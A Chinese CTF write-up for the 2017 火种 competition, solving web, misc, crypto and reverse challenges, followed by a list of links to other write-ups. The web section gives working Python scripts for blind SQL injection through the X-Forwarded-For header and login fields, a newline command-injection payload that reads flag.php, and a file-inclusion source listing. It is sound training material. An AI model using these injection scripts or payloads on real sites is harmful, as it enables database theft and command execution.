2017 火种CTF Writeup
趁着周日的时间打了个小比赛。。。。
WEB
1 签到
直接关注就OK key{welcome_to_anyuntec!}
2 一道简单的Web题
利用XFF注入
猜测后台逻辑是一个insert注入
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
那么我们可以进行注入了
贴上注入脚本
#!/usr/bin/env python2
# -*-coding:utf-8-*-
import requests
import string
url="http://aim.zhugeaq.com:82"
guess='1234567890abcdeflg{}'
flag=""
for i in range(1,100):
for str in guess:
headers={"x-forwarded-for":"xx'+"+"(select case when (ascii(substring((select flag from flag ) from %d for 1 ))=%d) then sleep(5) else 1 end ) and '1'='1" %(i,ord(str))}
res=requests.get(url,headers=headers)
sec=res.elapsed.seconds
if sec > 4:
flag = flag + str
print flag
break
print flag
flag{4c9551d5be5612f7bb5d286785}
3 猜猜我在哪里
robots.txt找到要访问index.txt
<?php
if (empty($_GET["file"])){
echo('../flag.php');
return;
}
else{
$filename='pages/'.(isset($_GET["file])?$_GET["file"]:"welcome.txt").'.html';
include $filename;
}
?>
4 前端跑路了QAQ
index.txt 查看源码
<?php
$ip = isset($_POST['ip'])?$_POST['ip']:die();
if(!preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/i',$ip)){
die("ip 格式错误!");
}
echo strlen($ip);
if(strlen($ip)<7||strlen($ip)>21){
die("ip 长度错误!");
}
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' .$ip );
}else {
// *nix
$cmd = shell_exec( 'ping -c 1 ' .$ip );
}
// Feedback for the end user
echo "<pre>{$cmd}</pre>";
这里ip的长度限制为25之内给了我们可乘之机
通过构造 ip=0.0.0.1%0acat flag.php
5 你看到我的密码了嘛
一道基本的注入题目
发现过滤了一些东西
information limit ()
这里主要是过滤了()不能通过正常的注入
在本地测试可以得到字段名
尝试利用order by注入
import requests
url="http://aim.zhugeaq.com:83/index.php"
string = ''
for i in range(1,33):
for j in range(33,127):
string += chr(j)
data = {
'username':"admin_r' union select 1,2,'{}' order by 3#".format(string),
'password':"admin"
}
s=requests.post(url=url,data=data)
content=s.content
print chr(j),'|',string
string = string[:-1]
if 'admin_r' in content:
string += chr(j-1)
print string,"***************************************"
break
print string
FLAG{93FCFF2AF3914F7}
6 一道很难的Web题
考察基本的注入知识
black: where & and order limit sleep
white: union select from , # -- ascii = substr
# coding:utf-8
import requests
url = 'http://aim.zhugeaq.com:85/01/login.php'
dic = '1234567890abcdef'
string = ""
for i in range(2,34):
for j in dic:
payload = "1'/1=(ascii(substr((pass)from(1)-{}))={})/'1'='1".format(i,ord(j))
data = {
'username':payload,
'pass':'1'
}
re = requests.post(url=url,data=data)
if "用户名错误" in re.content:
string += j
print string
print string[::-1]
d1c46106fdda5b257a9f8bf503747fe4
利用md5解密:aaa@qq.com#123
flag{b9b0b759ad3e8a5129044c115e042c59}
MISC
1.截获了一个文件
a2V5ezIwMTZfa2V5X2hlbHB9==
Base64解密 key{2016_key_help}
2.这是什么
明显是unicode
3.Keyboard
#jrecbi]gyu8
e.u pry(owRuuo.yQ)S
e.u {pry(jd)S
ypfS
aoj ] rpe(jd)
.qj.lyS
p.ygpb jd
cu (aoj V 96) abe (aoj W 123)S
p.ygpb jdp((aoj[97}Ruuo.yQ)v{{mre{{(26) } 97)
.ncu (aoj V 64) abe (aoj V 91)S
p.ygpb jdp((aoj[65}Ruuo.yQ)v{{mre{{(26) } 65)
.no.S
p.ygpb jd
p.ygpb --vhrcb(/{pry( j ) urp j cb o=)
lpcby pry( -qpn?popbpo.+-w 13 )
rot13加密
最后找到对应加密qpn?popbpo.+
-> xrl{rsrnrse}
绕后直接ROT13转换 key{efeaeffr}
CRYPTO
解密1
解密2
base64解密
Tk5TWFM2M0pPTlJXR1kzR09KVEdPNURCTVZUR0NaM1NOQjJIMj09PQ==
base32解密
NNSXS63JONRWGY3GOJTGO5DBMVTGCZ3SNB2H2===
key{iscccfrfgtaefagrht}
解密4
想着应该是异或
写了个脚本
s1 = [0b00000010,0b00001000,0b00011010,0b00000110,0b00001010]
s2 = 'large'
flag = ''
for i in range(5):
flag += chr(s1[i]^ord(s2[i]))
print flag
解密5
e6Z9i~]8R~U~QHE{RnY{QXg~QnQ{^XVlRXlp^XI5Q6Q6SKY8jUAA
凯撒移位范围大点就可以 a2V5ezY4NzQzMDAwNjUwMTczMjMwZTRhNThlZTE1M2M2OGU4fQ==
解密 key{68743000650173230e4a58ee153c68e8}
解密6
md5碰撞
import random
import string
def md5(str):
import hashlib
m = hashlib.md5()
m.update(str)
return m.hexdigest()
while 1:
string = ''
s = string.join(random.sample('qwertyuiopasdfghjklzxcvbnm1234567890',4))
if md5(s)[0:10] == 'd9ddd1800f':
print s
break
d9ddd1800fb812bd62e3fc55c35599b0
REVERSE
***去哪儿了
首先说了username是anyuntec
利用IDA找到了关键函数
for ( i = 0; i < (signed int)strlen(&String); ++i )
{
if ( *(&v7 + i) != i + *(&String + i) - strlen(&String) )
break;
}
最后写出逆向脚本
str1 = 'anyuntec'
str2 = ''
for i in range(len(str1)):
str2 += chr(ord(str1[i]) + i - len(str1))
print str2
简单的PE逆向
***** my apk~
通过JEB反编译,检查逻辑.
用户名是Tenshine
flag是首先md5,然后隔位取字符
用户名md5:
b9c77224ff234f27ac6badf83b855c76
得到flag:
flag{bc72f242a6af3857}
re300
利用PEID查看程序,是win32 GUI 程序, Delphi编写。利用ida分析
发现有createthread,怀疑是子线程检测
定位到这
利用OD动态查看
找到了子线程的函数地址0x409134
下断点寻找处理函数ctrl+F7跟踪,跟踪到了下面的函数
利用IDA查看
发现了加密函数
__int64 __fastcall sub_5C5054(__int64 a1, int a2, signed int a3)
{
char *v3; // aaa@qq.com
int v4; // aaa@qq.com
char v5; // aaa@qq.com
signed int v6; // aaa@qq.com
char v7; // aaa@qq.com
char v8; // aaa@qq.com
__int64 v10; // [sp-20h] [bp-30h]@1
unsigned int v11; // [sp+0h] [bp-10h]@1
char v12; // [sp+7h] [bp-9h]@1
int v13; // [sp+8h] [bp-8h]@1
int v14; // [sp+Ch] [bp-4h]@1
v13 = a2;
v11 = HIDWORD(a1);
v14 = a1;
v10 = a1;
v3 = (char *)a1;
v4 = v13;
v12 = 0;
v5 = 0;
v6 = 0;
while ( v6 <= v11 )
{
v7 = *v3;
*v3 ^= 0x78u;
*v3 ^= 5u;
*v3 ^= 0x27u;
*v3 ^= v6++;
v5 += v12;
*v3 ^= v5;
v8 = *(_BYTE *)v4++;
*v3 ^= v8;
++v3;
v12 = v7;
if ( !(v6 % a3) )
v4 = v13;
}
return v10;
}
这是比对函数
这是内存比对
# -*- coding:utf-8 -*-
a = [0x53 ,0x22 ,0x9B ,0x18 ,0xDB ,0x70 ,0xD0 ,0x40 ,0x2A ,0xD2 ,0x2F ,0xCA ,0xA4 ,0x11 ,0xC8 ,0xA5,
0x1D ,0xFD ,0x39 ,0x59 ,0x97 ,0x68 ,0x39 ,0xF5 ,0x94 ,0x45 ,0x07 ,0x2E ,0xA0 ,0x1D ,0x23 ,0x9D ]
b = [0x62 ,0x77, 0x6A, 0x73, 0x37 ,0x4D, 0x6E ,0x66, 0x61, 0x39, 0x55 ,0x78 ,0x78 ,0x6B, 0x61, 0x6E,
0x53 ,0x22, 0x9B, 0x18, 0xDB ,0x70, 0xD0 ,0x40, 0x2A, 0xD2, 0x2F ,0xCA ,0xA4 ,0x11, 0xC8, 0xA5,
0x1D ,0xFD, 0x39, 0x59, 0x97 ,0x68, 0x39 ,0xF5, 0x94, 0x45, 0x07 ,0x2E ,0xA0 ,0x1D, 0x23, 0x9D]
# print(b)
v5 = 0
v7 = 0
s = ""
for i in range(len(a)):
a[i]^=b[i]
v5 +=v7
if v5>255:
v5 = v5&255
a[i]^=v5
a[i]^=i
a[i]^=0x27
a[i]^=0x5
a[i]^=0x78
v7 = a[i]
if (i+1)%16==0:
for j in range(7):
b[i+j+1] = b[j]
print s.join([chr(i) for i in a])
key{vXpybehIyAPcUt28}
上一篇: 基于PHP服务端图片生成缩略图的方法详解
推荐阅读
-
32C3 CTF 两个Web题目的Writeup
-
level2 [XCTF-PWN]CTF writeup系列6
-
libc2.26以下的单一堆溢出漏洞利用——0ctf_2017_babyheap
-
火种CTF 2019年江西高校网络安全大赛 PWN easyshellcode writeup
-
Roar CTF 2019 坦克大战 Writeup
-
BSidesSF 2020 CTF writeup
-
InsomniHack 2016 CTF teaser – Bring the noise Crypto 200 WriteUp_html/css_WEB-ITnose
-
CTF [RoarCTF 2019]Easy Calc writeup PHP字符串解析特性Bypass http请求走私(HTTP Request Smuggling)
-
cgpwn2 [XCTF-PWN]CTF writeup系列10
-
stack2 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列15